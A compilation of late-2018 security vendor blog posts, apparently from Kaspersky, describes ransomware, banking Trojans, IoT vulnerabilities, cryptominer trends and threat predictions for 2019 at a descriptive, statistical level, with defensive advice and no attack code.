The fall in the number of ransomware attacks in the last year or so has been well-documented. Nevertheless, this type of malware remains a significant problem and we continue to see the development of new ransomware families. Early in August, our anti-ransomware module started detecting the KeyPass Trojan. In just two days, we found this malware in more than 20 countries – Brazil and Vietnam were hardest hit, but we also found victims in Europe, Africa and the Far East. KeyPass encrypts all files, regardless of extension, on local drives and network shares that are accessible from the infected computer. It ignores some files, located in directories that are hardcoded in the malware. Encrypted files are given the additional extension ‘KEYPASS’ and ransom notes, called ‘!!!KEYPASS_DECRYPTION_INFO!!!.txt’, are saved in each directory containing encrypted files. The creators of this Trojan implemented a very simplistic scheme. The malware uses the symmetric algorithm AES-256 in CFB mode with zero IV and the same 32-byte key for all files. The Trojan encrypts a maximum of 0x500000 bytes (~5 MB) of data at the start of each file. Shortly after launch, the malware connects to its C2 server and obtains the encryption key and infection ID for the current victim. The data is transferred over plain HTTP in the form of JSON. If the C2 is unavailable – for example, if the infected computer is not connected to the internet, or the server is down – the malware uses a hardcoded key and ID. As a result, in the case of offline encryption, the decryption of the victim’s files is trivial.

Probably the most interesting feature of the KeyPass Trojan is the ability to take ‘manual control’. The Trojan contains a form that is hidden by default, but which can be shown after pressing a special button on the keyboard. This form allows the criminals to customize the encryption process by changing such parameters as the encryption key, the name of the ransom note, the text of the ransom, the victim ID, the extension of encrypted files and the list of directories to be excluded from encryption. This capability suggests that the criminals behind the Trojan might intend to use it in manual attacks.

However, it’s not only new ransomware families that are causing problems. One and a half years after the WannaCry epidemic, it continues to top the list of the most widespread cryptor families – so far, we have seen 74,621 unique attacks worldwide. These attacks accounted for 28.72% of all those targeted with cryptors in Q3 2018. This percentage has risen by two-thirds during the last year. This is especially alarming considering that a patch for the EternalBlue exploit used by WannaCry existed even before the initial epidemic in May 2017.

Asacub and banking Trojans

2018 showed the most impressive figures in terms of the number of attacks involving mobile banking Trojans. At the beginning of the year, this type of threat seemed to have leveled off both in number of unique samples detected and number of users attacked.

However, in the second quarter there was a dramatic change for the worse: record-breaking numbers of detected mobile banking Trojans and attacked users. The root cause of this significant upturn is unclear, though the main culprits were the creators of Asacub and Hqwar. An interesting feature of Asacub is its longevity: according to our data, the group behind it has been operating for more than three years.

Asacub evolved from an SMS Trojan, which from the very outset possessed techniques for preventing deletion and intercepting incoming calls and SMSs. The creators subsequently complicated the program logic and started the mass distribution of the malware. The chosen vector was the same as that at the very beginning – social engineering via SMS. However, this time the valid phone numbers were sourced from popular bulletin boards, with owners often expecting messages from unfamiliar subscribers.

The propagation technique then snowballed when the devices that the Trojan had infected started spreading the infection – Asacub self-proliferated to the victim’s entire contact list.

Smart doesn’t mean secure

These days we’re surrounded by smart devices. This includes everyday household objects such as TVs, smart meters, thermostats, baby monitors and children’s toys. But it also includes cars, medical devices, CCTV cameras and parking meters. We’re even seeing the emergence of smart cities. However, this offers a greater attack surface to anyone looking to take advantage of security weaknesses – for whatever purpose. Securing traditional computers is difficult. But things are more problematic with the internet of things (IoT), where lack of standardization leaves developers to ignore security, or consider it as an afterthought. There are plenty of examples to illustrate this.

In February, we explored the possibility that a smart hub might be vulnerable to attack. A smart hub lets you control the operation of other smart devices in the home, receiving information and issuing commands. Smart hubs might be controlled through a touch screen, or through a mobile app or web interface. If it’s vulnerable, it would potentially provide a single point of failure. While the smart hub our researchers investigated didn’t contain significant vulnerabilities, there were logical mistakes that were enough to allow our researchers to obtain remote access.

Researchers at Kaspersky Lab ICS CERT checked a popular smart camera to see how well protected it is from hackers. Smart cameras are now part of everyday life. Many now connect to the cloud, allowing someone to monitor what’s happening at a remote location – to check on pets, for security surveillance, etc. The model our researchers investigated is marketed as an all-purpose tool – suitable for use as a baby monitor, or as part of a security system. The camera is able to see in the dark, follow a moving object, stream footage to a smartphone or tablet and play back sound through a built-in speaker. Unfortunately, the camera turned out to have 13 vulnerabilities – almost as many as it has features – that could allow an attacker to change the administrator password, execute arbitrary code on the device, build a botnet of compromised cameras or stop it functioning completely.

Potential problems are not limited to consumer devices. Early this year, Ido Naor, a researcher from our Global Research and Analysis Team and Amihai Neiderman from Azimuth Security, discovered a vulnerability in an automation device for a gas station. This device was directly connected to the internet and was responsible for managing every component of the station, including fuel dispensers and payment terminals. Even more alarming, the web interface for the device was accessible with default credentials. Further investigation revealed that it was possible to shut down all fueling systems, cause a fuel leakage, change the price, circumvent the payment terminal (in order to steal money), capture vehicle license plates and driver identities, execute code on the controller unit and even move freely across the gas station network.

Technology is driving improvements in healthcare. It has the power to transform the quality and reduce the cost of health and care services. It can also give patients and citizens more control over their care, empower carers and support the development of new medicines and treatments. However, new healthcare technologies and mobile working practices are producing more data than ever before, at the same time providing more opportunities for data to be lost or stolen. We’ve highlighted the issues several times over the last few years (you can read about it here, here and here). We continue to track the activities of cybercriminals, looking at how they penetrate medical networks, how they find data on publicly available medical resources and how they exfiltrate it. In September, we examined healthcare security. More than 60% of medical organizations had some kind of malware on their computers. In addition, attacks continue to grow in the pharmaceutical industry. It’s vital that medical facilities remove all nodes that process personal medical data, update software and remove applications that are no longer needed, and do not connect expensive medical equipment to the main LAN. You can find our detailed advice here.

This year, we also investigated smart devices for animals – specifically, trackers to monitor the location of pets. These gadgets are able to access the pet owner’s home network and phone, and their pet’s location. We wanted to find out how secure they are. Our researchers looked at several popular trackers for potential vulnerabilities. Four of the trackers we looked at use Bluetooth LE technology to communicate with the owner’s smartphone. But only one does so correctly. The others can receive and execute commands from anyone. They can also be disabled, or hidden from the owner – all that’s needed is proximity to the tracker. Only one of the tested Android apps verifies the certificate of its server, without relying solely on the system. As a result, they are vulnerable to man-in-the-middle (MitM) attacks—intruders can intercept transmitted data by ‘persuading’ victims to install their certificate.

Some of our researchers also looked at human wearable devices – specifically, smart watches and fitness trackers. We were interested in a scenario where a spying app installed on a smartphone could send data from the built-in motion sensors (accelerometer and gyroscope) to a remote server and use the data to piece together the wearer’s actions – walking, sitting, typing, etc. We started with an Android-based smartphone, created a simple app to process and transmit the data and then looked at what we could get from this data. Not only was it possible to work out that the wearer is sitting or walking, but also figure out if they are out for a stroll or changing subway trains, because the accelerometer patterns differ slightly – this is how fitness trackers distinguish between walking and cycling. It is also easy to see when someone is typing. However, finding out what they are typing would be hard and would require repeated text entry. Our researchers were able to recover a computer password with 96 per cent accuracy and a PIN code entered at an ATM with 87 per cent accuracy. However, it would be much harder to obtain other information – for example, a credit card number or CVC code – because of the lack of predictability about when the victim would type such information. In reality, the difficulty involved in obtaining such information means that an attacker would have to have a strong motive for targeting someone specific. Of course, there are situations where this might be worthwhile for attackers.

There has been a growth in car sharing services in recent years. Such services clearly provide flexibility for people wanting to get around major cities. However, it raises the question of security – how safe is the personal information of people using the services? In July, we tested 13 apps, to see if their developers have considered security. The results of our tests were not encouraging. It’s clear that app developers don’t fully understand the current threats to mobile platforms – this is true for both the design stage and when creating the infrastructure. A good first step would be to expand the functionality for notifying customers of suspicious activities – only one service currently sends notifications to customers about attempts to log in to their account from a different device. The majority of the apps we analyzed are poorly designed from a security standpoint and need to be improved. Moreover, many of the programs are not just very similar to each other but are actually based on the same code. You can read our report here, including advice for customers of car sharing services and recommendations for developers of car sharing apps.

The use of smart devices is increasing. Some forecasts suggest that by 2020 the number of smart devices will exceed the world’s population several times over. Yet manufacturers still don’t prioritize security: there are no reminders to change the default password during initial setup or notifications about the release of new firmware versions. And the updating process itself can be complex for the average consumer. This makes IoT devices a prime target for cybercriminals. Easier to infect than PCs, they often play an important role in the home infrastructure: some manage internet traffic, others shoot video footage and still others control domestic devices – for example, air conditioning. Malware for smart devices is increasing not only in quantity, but also quality. More and more exploits are being weaponized by cybercriminals, and infected devices are used to launch DDoS attacks, to steal personal data and to mine crypto-currency. In September, we published a report on IoT threats, and this year we have started to include data on IoT attacks in our quarterly and end-of-year statistics reports.

It’s vital that vendors improve their security approach, ensuring that security is considered when products are being designed. Governments in some countries, in an effort to encourage security by design in manufacturers of smart devices, are introducing guidelines. In October, the UK government launched its code of practice for consumer IoT security. The German government recently published its suggestions for minimum standards for broadband routers.

It’s also important that consumers consider security before buying any connected device.

  • Consider if you really need the device. If you do, check the functions available and disable any that you don’t need to reduce your attack surface.
  • Look online for information about any vulnerabilities that have been reported.
  • Check to see if it’s possible to update the firmware on the device.
  • Always change the default password and replace it with a unique, complex password.
  • Don’t share serial numbers, IP addresses and other sensitive data relating to the device online.
Our data in their hands

Personal information is a valuable commodity. This is evident from the steady stream of data breaches reported in the news – these include Under Armour, FIFA, Adidas, Ticketmaster, T-Mobile, Reddit, British Airways and Cathay Pacific.

The scandal involving the use, by Cambridge Analytica, of Facebook data is a reminder that personal information is not just valuable to cybercriminals. In many cases, personal data is the price people pay to obtain a product or service – ‘free’ browsers, ‘free’ email accounts, ‘free’ social network accounts, etc. But not always. Increasingly, we’re surrounded by smart devices that are capable of gathering details on the minutiae of our lives. Earlier this year, one journalist turned her apartment into a smart home in order to measure how much data was being collected by the firms that made the devices. Since we generally pay for such devices, the harvesting of data can hardly be seen as the price we pay for the benefits they bring in these cases.

Some data breaches have resulted in fines for the companies affected (the UK Information Commissioner’s Office fined Equifax and Facebook, for example). However, so far fines levied have been for breaches that occurred before the EU General Data Protection Regulation (GDPR) came into force in May. The penalties for any serious breaches that occur in the future are likely to be much higher.

There’s no such thing as 100% security, of course. But any organization that holds personal data has a duty of care to secure it effectively. And where a breach results in the theft of personal information, companies should alert their customers in a timely manner, enabling them to take steps to limit the potential damage that can occur.

While there’s nothing that we, as individuals, can do to prevent the theft of our personal information from an online provider, it’s important that we take steps to secure our online accounts and to minimize the impact of any breach – in particular, by using unique passwords for each site, and by using two-factor authentication.

First Annual Cyberwarcon

Thu, 11/29/2018 - 14:14

Cyberwarcon is a brand new event organized yesterday in Arlington, Virginia, and delivered eight hours of fantastic content. “CyberwarCon is a one-day conference in the Washington D.C. area focused on the specter of destruction, disruption, and malicious influence on our society through cyber capabilities. We are increasingly concerned that aggressive behavior in this space is not abating and public discourse is necessary to shore up our defenses and prepare for inevitable incidents”. The list of speakers was diverse in their interests, from big data visualization technologies and analysis of social media misinformation campaigns, to incidents of Russian speaking APT in the US electrical grid. Thomas Rid keynoted with a presentation full of newly unearthed images on details on the earliest known misinformation campaign targeting the US, with some hints of what is to come for his upcoming book “Active Measures: A History of Disinformation”, certain to be another fascinating study and read. The full agenda can be found here.

Our participation included my lightning talk presentation “Barely Whispering – Recent RU-speaking APT findings”. I attempted to clarify several transitively related clusters of RU-speaking APT activity and resources that we label Sofacy, BE/GreyEnergy, Zebrocy, and an advanced cluster, Hades, and introduced some data points new to public discussion about the groups. It’s nice to see that some of the information I mentioned yesterday, Zebrocy’s nine month long and increasingly large wave of spearphishing, is in the news today. I briefly mentioned that their remote template spearphishing techniques, along with a switch back to the Delphi backdoor from a C# “Cannon” backdoor, was spreading to western networks. Timely stuff.

Check out the images and tweets at #CYBERWARCON. Hope to see you next year!

Kaspersky Security Bulletin 2018. Story of the year: miners

Wed, 11/28/2018 - 05:00

Cryptocurrency miners that infect the computers of unsuspecting users essentially operate according to the same business model as ransomware programs: the victim’s computing power is harnessed to enrich the cybercriminals. Only in the case of miners, it might be quite a while before the user notices that 70–80% of their CPU or graphics card power is being used to generate virtual coins. Encrypted documents and ransomware messages are far harder to miss.

Cryptominers usually find their way onto user computers and corporate machines along with adware, hacked games, and other pirated content. What’s more, the present “entry threshold” — that is, the actual process of creating a miner — is rather low: cybercriminals are assisted by ready-to-use affiliate programs, open mining pools, and miner builders. If that weren’t enough, there is another way to steal computing resources through a webpage-embedded mining script that starts when the user opens the site in a browser.  A separate category of cybercriminals are those who target not private computers, but the servers of large companies, for which the infection process is considerably more resource-intense.

Trends

2018 began with a rise in the number of miner-related attacks. However, after a drop in the value of the main cryptocurrencies, which lasted from January to February, infection activity noticeably declined. General interest in cryptocurrencies also waned.  Yet the graph clearly shows that while the number of cryptominer attacks decreased, the threat is still current. As for how the November collapse in the Bitcoin exchange rate will affect the number of infections, time will tell.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of unique users attacked by miners in Q1–Q3 2018 (download)

Hidden mining software was very popular among botnet owners, as confirmed by our statistics on files downloaded by zombie networks: Q1 2018 saw a boom in cryptominers, and the share of this malware in the first half of the year was 4.6% of the total number of files downloaded by botnets. For comparison, in Q2 2017 this figure was 2.9%. It follows from the data that cybercriminals have come to view botnets as a means of spreading software for mining cryptocurrencies.

H2 2017 H1 2017 1 Lethic 17.0% njRAT 5.2% 2 Neutrino.POS 4.6% Lethic 5.0% 3 njRAT 3.7% Khalesi 4.9% 4 Emotet 3.5% Miners 4.6% 5 Miners 2.9% Neutrino.POS 2.2% 6 Smoke 1.8% Edur 1.3% 7 Cutwail 0.7% PassView 1.3% 8 Ransomware 0.7% Jimmy 1.1% 9 SpyEye 0.5% Gandcrab 1.1% 10 Snojan 0.3% Cutwail 1.1%

Most downloaded threats, H2 2017–H1 2018

Still on the topic of botnets, it is impossible not to mention that in Q3 2018 we registered a decline in the number of DDoS attacks, the most likely reason being, according to our experts, the “reprofiling” of botnets from DDoS attacks to cryptocurrency mining. This was induced not only by the high popularity of cryptocurrencies, but also the high competition in the “DDoS market”, which made the attacks less expensive for clients, but not for the botnetters themselves, who still have to cope with more than a few less-than-legal “organizational issues.”

Mining differs favorably for cybercriminals in that, if executed properly, it can be impossible for the owner of an infected machine to detect, and thus the chances of encountering the cyberpolice are far lower. And the reprofiling of existing server capacity completely hides its owner from the eyes of the law. Evidence suggests that the owners of many well-known botnets have switched their attack vector toward mining.  For example, the DDoS activity of the Yoyo botnet dropped dramatically, although there is no data about it being dismantled.

Moreover, mining has started to command as much (or more) attention as ransomware: this year we encountered several examples of reprofiled malware with added functionality for cryptocurrency mining. And the techniques used by the creators of miners have become more sophisticated.

For instance, an interesting miner implementation, which we dubbed PowerGhost, caught our eye in July this year. The malware can stealthily establish itself in the system and spread inside large corporate networks, infecting workstations and servers alike. To go unnoticed by users and security solutions for as long as possible, the miner employs various fileless techniques. Infection occurs remotely using exploits or remote management tools (Windows Management Instrumentation), and involves running a single-line powershell script that downloads the main body of the malware and immediately starts it without writing to the hard drive.

Another example of reprofiling is the ransomware Trojan Trojan-Ransom.Win32.Rakhni, the first samples of which were detected by Kaspersky Lab back in 2013. Its mining functions are a 2018 innovation. At the same time, their activation depends on whether the folder %AppData%\Bitcoin is present on the infected machine. If it exists, the loader downloads the ransomware. If there is no such folder and, in addition, the computer has more than two logical processors, a miner is downloaded. To keep the malware hidden in the system, the developers made it look like an Adobe product. This can be seen by the icon and the name of the executable file, as well as the fake digital signature, which uses Adobe Systems Incorporated as the company name.

Another piece of malware that has learned how to seed computers with mining utilities is the previously adware-only PBot. The malware spreads through affiliate sites that inject scripts into their pages for redirecting users to sponsored links. The standard distribution scheme looks as follows:

  1. The user visits one of the sites in the affiliate network.
  2. Clicking anywhere on the page causes a new browser window to appear, where an intermediate link opens.
  3. The link directs the user to the PBot download page, which is tasked with downloading and running the malware by deceptive means.

The most common coin among all illegally mined cryptocurrencies is Monero (xmr). This is due to its anonymous algorithm, relatively high market value, and ease of sale, since it is accepted by most major cryptocurrency exchanges. For botnets mining this coin illegally, it is important that CPU resources can be utilized. By some accounts, a total of $175 million has been mined illegally, representing around 5% of all Monero currently in circulation.

Factors affecting the distribution of miners

The conclusion based on data we obtained from various sources is that legislative control over cryptocurrencies has little impact on the spread of hidden mining. For example, in Algeria and Vietnam cryptocurrencies are either prohibited or severely restricted under domestic law. Yet Vietnam is third in the ranking of leading countries by number of miner attacks, and Algeria is sixth. Meanwhile, Iran, which is presently drafting legislation to govern cryptocurrency and developing plans to issue its own “coins,” is in seventh place.

Country Cryptocurrency status % of attacks Kazakhstan Not prohibited, Not legalized 16.75% Vietnam Issuance (mining) prohibited 13.00% Indonesia Recognized as an exchange commodity 12.87% Ukraine Circulation governed by law 11.19% Russia Legislation under consideration 10.71% Algeria Prohibited 9.03% Iran Legislation in preparation, creation of own cryptocurrency planned 7.21% India Ban under consideration, hearings in progress 7.20% Thailand Circulation governed by law 6.76% Taiwan Not prohibited 5.81%

Top 10 countries by share of miner attacks, January–October 2018 (includes only countries with more than 500,000 Kaspersky Lab clients)

At the other end of the scale, US users were the least affected by cryptominters (1.33% of the total number of attacks), followed by users in Switzerland (1.56%) and Britain (1.66%).

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Map representing countries with the lowest share of miner attacks, January–October 2018 (includes only countries with more than 500,000 Kaspersky Lab clients) (download)

The prevalence of miners is not impacted by the cost of electricity, which varies greatly from country to country. Again, this factor is not a consideration for cybercriminals as they exploit third-party resources.

Distribution methods

Looking at the distribution of pirated software in countries with the highest number of miner attacks, one sees a clear correlation: the more freely unlicensed software is distributed, the more miners there are. This is confirmed by our statistics, which indicates that miners most often land on victim computers together with pirated software.

Another penetration vector for miners is adware installers distributed using social engineering. More sophisticated options (for example, propagation through vulnerabilities such as EternalBlue) are aimed at server capacities and are less frequently encountered.

And it should not be forgotten that USB drives have been used to distribute cryptocurrency mining software since at least 2015. The percentage of detections of the popular Bitcoin miner Trojan.Win64.Miner.all on removable devices is growing annually by about one-sixth. In 2018, one in ten users affected by malware transmitted through flash drives was the victim of this particular miner (roughly 9.22%; for comparison, in 2017 it was 6.7%, and in 2016 4.2%).

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Millions of unique users found to have malware in the root directory, which is the main sign of infection via removable drives, 2013–2018. Source: KSN (download)

Trojan.Win32.Miner.ays/Trojan.Win.64.Miner.all was detected in India (23.7%), Russia (18.45%), and Kazakhstan (14.38%), but some cases were also logged in Asia, Africa, and Europe (Britain, Germany, the Netherlands, Switzerland, Spain, Belgium, Austria, Italy, Denmark, Sweden), as well as the US, Canada, and Japan.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Share of users impacted by Bitcoin miners on removable drives, 2018. Source: KSN (includes only countries with more than 10,000 Kaspersky Lab clients) (download)

Conclusion

Summing up the past year, we can highlight the following bullet points:

  1. Given the growing value and popularity of cryptocurrencies, cybercriminals are investing resources in the development of new mining technologies, which, according to our data, are gradually replacing ransomware Trojans.
  2. Hidden mining activity declines when cryptocurrency prices fall.
  3. The spread of hidden mining is not impacted by factors such as domestic legislative control or cost of electricity.
  4. Miners often get on victims’ computers during the download of unlicensed content or installation of pirated software. As a consequence, this type of threat is most prevalent in countries with poor regulation of the unlicensed software market, as well a low level of overall digital literacy among users.

Kaspersky Security Bulletin 2018. Story of the year: miners” (English, PDF)

Threat predictions for industrial security in 2019

Mon, 11/26/2018 - 09:00

The past few years have been very intense and eventful when it comes to incidents affecting the information security of industrial systems. That includes new vulnerabilities, new threat vectors, accidental infections of industrial systems and detected targeted attacks. In response, last year we developed some Threat Predictions for Industrial Security in 2018, outlining the trends most likely to unfold in the year ahead.

The industrial cybersecurity threat landscape moves at a slower and more rigid pace than the information technology threat landscape in general. Attacks on ICS are still hard to monetize. Industrial organizations are still out of scope for the majority of cybercriminals. They are a relatively new target for adversaries who have already started attacking them. These are still applying existing tools and tactics to their attacks. That is why the majority of the industrial threat predictions from last year are still unfolding, although some of them have already come true.

Kaspersky Lab specialists have spent a few years investigating the cyberthreat landscape for industrial organizations and trying to bring their expertise and technology to OT environments. We are still on a long journey, with various to difficulties cope with and problems yet to solve. Constantly keeping in contact with many researchers in other security organizations and some ICS security pioneers from inside industrial companies; we have come to the conclusion that some of the difficulties we face are common to the industry. Solving some of those is mandatory to make the world more secure and safe.

So, although the fog of 2018’s predictions and threat landscape has yet to clear, we decided to focus on the major problems likely to affect the work of professionals involved in industrial systems in 2019.

Top four cybersecurity challenges facing industrial enterprises in 2019 The ever-increasing attack surface

The increasing amount of automation systems, the variety of automation tools, number of organizations and individuals with direct or remote access to automation systems, as well as the emergence of communication channels for monitoring and remote control between previously independent objects – all expand the opportunities for criminals to plan and execute their attacks.

Growing interest of cybercriminals and special services

A decrease in profitability and increase in risks from cyberattacks aimed at traditional victims is pushing criminals to search for new targets, including those within industrial organizations.

At the same time, special services in many countries, as well as other organized groups – motivated by internal and external political interests – and financially-motivated groups, are actively engaged in the research and development of techniques to implement espionage and terrorist attacks aimed at industrial enterprises.

Taking into account the current geopolitical context, the development of industrial enterprises’ automation systems, and the transition to new management processes and models of production and economic activity, this situation will continue to develop in the coming years, negatively affecting industrial organizations.

The underestimation of general threat levels

A lack of public access to information about information security issues within industrial enterprises, coupled with the relative rarity of targeted attacks on automation systems, an excessive belief in emergency protection systems and the denial of objective reality is having a negative effect on the assessment of threat levels by owners and operators of industrial enterprises and their personnel.

The misunderstanding of threat specifics and the suboptimal choice of protection options

In the world of industrial cybersecurity, several high–profile incidents carried out with the help of targeted attacks against a very limited number of victims, created an information landscape that formed fully the idea of a potential threat – both among information security researchers and security developers, and among potential users of these tools.

However, the professional reporting of these incidents was often too difficult to understand by the majority of potential users, and was devoid of important OT details. The information field formed in these conditions, including the absence of a daily need to deflect the attacks aimed at automated control systems, gave developers a chance to create products that might protect better from the artificial scenarios thought up by researchers themselves, than from real world day-to-day threats. This could leave the automation systems of industrial enterprises vulnerable to real life attacks, including random ones and targeted attack campaigns organized by cyber criminals.

Full version of the threat predictions will be published on ICS CERT website.

Full report “Kaspersky Security Bulletin: Threat predictions for industrial security in 2019″ (English, PDF)

Cryptocurrency threat predictions for 2019

Mon, 11/26/2018 - 05:00

Introduction – key events in 2018

2018 saw cryptocurrency become an established part of many people’s lives, and a more attractive target for cybercriminals across the world. To some extent, the malicious mining of cryptocurrencies even prevailed over the main threat of the last few years: ransomware.

However, in the second half of 2018, the blockchain and cryptocurrency industry faced a major development: falling prices for cryptocurrencies. The impact was felt across the landscape, with rapid decline in public interest, the activity of the crypto community and traders, and in the related activity of cybercriminals.

While this will certainly affect our forecasts for 2019, let’s see how the forecasts we made for this year worked out.

1. ‘Ransomware attacks will force users to buy cryptocurrency’

This prediction turned out to be partially true. In 2018, we saw a decline in the popularity of encryptors, combined with a rise in the malicious use of cryptocurrency miners. It transpired that it is safer for attackers to perform discreet mining on infected devices than to demand a ransom and attract attention. However, it is too early to dismiss ransomware as a major threat; it is still an effective method of infection and monetization of both individuals and organizations – and cryptocurrencies remain a more easily anonymized form of ransom payment.

2. ‘We will see targeted attacks with malicious miners’

This prediction did not come true. We observed mainly isolated incidents where miners were maliciously installed in an infected corporate network. There are several reasons for that:

  • Companies have learned to detect miners that are run on the computers of employees/administrators; both those installed by users themselves and by third parties without the knowledge of the user.
  • The attackers themselves do not appear to consider this a promising approach. Targeted and sophisticated attacks are more about gaining persistence in the network for the purpose of espionage or the theft of money or data. It is therefore better not to attract attention by crypto-mining.
3. ‘The rise of miners will continue and involve new actors’

This prediction also turned out to be partially true: the malicious use of cryptocurrency miners actively increased during the first quarter of 2018, peaking in March. Over the following months there was a gradual decrease in activity due to the drop in price for cryptocurrencies.

4. ‘There will be more web-mining’

Again, this prediction turned out to be partially true. The web mining of cryptocurrencies reached a peak in January 2018, after which it began to decline. Webmasters, hoping to use web mining as an alternative means of website monetization alongside advertising, did not usually notify users about any hidden mining taking place on their sites. This meant that web mining quickly became associated with malicious activity. After that, it was difficult to restore its reputation.

5. ‘The fall of ICOs (Initial Coin Offering)’

Yes and no. On the one hand, collecting money with the help of ICOs continued: projects became larger and the fees did not fall. On the other hand, many projects that collected impressive amounts through ICOs in 2017 were not be able to create the promised product in time during 2018, which inevitably affected the exchange price of the sold tokens.

Top three predictions for 2019 1. Excessive expectations about the use of blockchain beyond the cryptocurrency sphere will disappear

In the end, we expect this trend to be driven by people rather than the technology’s capability, as organizations and industries come to the conclusion that blockchain has a rather narrow scope of application, and most attempts to use in different ways are not justified. The reliable application of blockchain beyond cryptocurrency has been explored and experimented with for years, but there is little evidence of achievement. We expect 2019 to be the year people stop trying.

2. Cryptocurrencies as a means of payment will decline further

In 2017 a number of suppliers of goods and services announced that they would accept cryptocurrencies as a form of payment. However, in the face of huge commissions (an acute problem in December 2017), slow transfers, a large price for integration, and, most importantly, a small number of customers, its use as a method of payment declined steadily. In the end, the use of cryptocurrencies by a legitimate business simply does not make much sense.

3. There will be no return to 2017’s sky-high exchange rates

Until January 2018, there were immense highs and lows in the price of Bitcoin. But we do not expect these to return as the value of cryptocurrencies levels out to reflect their popularity. We believe there is a finite audience for whom cryptocurrencies are of interest, and once that limit is reached the price will not rise further.

 “Cryptocurrency threat predictions for 2019” (PDF)

Cyberthreats to financial institutions 2019: overview and predictions

Mon, 11/26/2018 - 05:00

Introduction – key events in 2018

The past year has been extremely eventful in terms of the digital threats faced by financial institutions: cybercrime groups have used new infiltration techniques, and the geography of attacks has become more extensive.

Despite this, let’s start the review with a positive trend: in 2018 police arrested a number of well-known cybercrime group members responsible for Carbanak/Cobalt and Fin7, among others. These groups have been involved in attacks on dozens, if not hundreds of companies and financial institutions around the world. Unfortunately, the arrest of group members including the leader of Carbanak, did not lead to a complete halt in activities – in fact, it seemingly started the process of splitting the groups into smaller cells.

The most active actor of 2018 was Lazarus. This group is gradually expanding its arsenal of tools and looking for new targets. The area of interest today includes banks, fin-tech companies, crypto-exchanges, PoS terminals, ATMs, and in terms of geography, we have recorded infection attempts in dozens of countries, most of which are located in Asia, Africa and Latin America.

At the end of last year, we noted that young fin-tech companies and crypto-exchanges are at a higher risk, due to the immaturity of their security systems. This certain type of companies was targeted most often. The most creative attack seen in 2018, from our point of view, was AppleJeus, which targeted cryptocurrency traders. In this case, criminals created special software that looked legitimate and carried out legitimate functions. However, the program also uploaded a malicious update that turned out to be a backdoor. This is a new type of attack, which infects its targets via the supply chain.

Continuing the topic of supply chain attacks, it is worth mentioning the MageCart group, which, by infecting website payment pages (including those of large companies such as British Airways) was able to access a huge amount of payment card data this year. This attack was even more effective because the criminals chose an interesting target – Magento, which is one of the most popular platforms for online stores. Using vulnerabilities in Magento, criminals were able to infect dozens of sites in a technique that is likely to be used by several other groups.

We should also note the development of ATM malware families. In 2018, Kaspersky Lab specialists discovered six new families, meaning that there are now more than 20 of this kind. Some ATM malware families have also evolved: for example, the Plotus malware from Latin America has been updated to a new version, Peralda, and has gained new functionality as a result. The greatest damage associated with attacks on ATMs was caused by infections from internal banking networks, such as FASTCash and ATMJackPot, which allowed attackers to reach thousands of ATMs.

2018 also saw attacks on organizations that use banking systems. Firstly, our machine learning-based behavioral analysis system detected several waves of malicious activity related to the spread of the Buhtrap banking Trojan this year, as attackers embedded their code in popular news sites and forums. Secondly, we detected attacks on the financial departments of industrial companies, where payments of hundreds of thousands of dollars would not cause much suspicion. Often in the final stages of attacks like this, attackers install remote administration tools on infected computers such as RMS, TeamViewer, and VNC.

Before giving our forecasts for 2019, let’s see how accurate our forecasts for 2018 turned out to be…

  • Attacks made through the underlying blockchain technologies of financial systems implemented by the financial institutions themselves – this did not happen in the financial field, but was seen in the online casino sector.
  • More supply chain attacks in the financial world – yes
  • Attacks on mass media (in general, including Twitter accounts, Facebook pages, telegram channels and more) including hacks and manipulation for getting financial profit through stock/crypto exchange trade – yes
  • ATM malware automation – yes. For example, there are malicious programs that immediately give money to attackers.
  • More attacks on crypto exchange platforms – yes
  • A spike in traditional card fraud due to the huge data breaches that happened in the previous year – no
  • More nation-state sponsored attacks against financial organizations – yes
  • The inclusion of fin-techs and mobile-only users in attacks: a fall in the number of traditional PC-oriented internet banking Trojans, with novice mobile banking users becoming the new prime target for criminals – yes. In particular, some banking Trojans stopped attacking users of online banking on PCs, while the number of Trojans attacking users of mobile devices has more than doubled over the past year.
Predictions for 2019
  • The emergence of new groups due to the fragmentation of Cobalt/Carbnal and Fin7: new groups and new geography

The arrest of leaders and separate members of major cybercrime groups has not stopped these groups from attacking financial institutions. Next year, we will most likely see the fragmentation of these groups and the creation of new ones by former members, which will lead to the intensification of attacks and the expansion of the geography of potential victims.

At the same time, local groups will expand their activities, increasing quality and scale. It is reasonable to assume that some members of the regional groups may contact former members of the Win7 or Cobalt group to facilitate access to regional targets and gain new tools with which they can carry out attacks.

  • The first attacks through the theft and use of biometric data

Biometric systems for user identification and authentication are being gradually implemented by various financial institutions, and several major leaks of biometric data have already occurred. These two facts lay the foundation for the first POC (proof-of-concept) attacks on financial services using leaked biometric data.

  • The emergence of new local groups attacking financial institutions in the Indo-Pakistan region, South-East Asia and Central Europe

